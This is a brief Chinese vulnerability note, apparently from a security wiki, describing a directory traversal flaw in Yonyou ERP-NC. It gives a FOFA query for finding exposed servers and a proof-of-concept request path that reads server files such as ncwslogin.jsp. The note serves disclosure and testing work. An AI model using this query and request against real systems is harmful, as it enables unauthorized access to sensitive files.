用友ERP-NC 目录遍历漏洞

漏洞描述

用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息

漏洞影响

[!NOTE]

用友ERP-NC

FOFA

[!NOTE]

app="用友-UFIDA-NC"

漏洞复现

POC为

/NCFindWeb?service=IPreAlertConfigService&filename=

查看 ncwslogin.jsp 文件

Goby & POC

[!NOTE]

YongYou ERP-NC directory traversal

Qingy文库 all right reserved,powered by GitbookFile Modify: 2021-07-15 20:15:11

results matching ""

    No results matching ""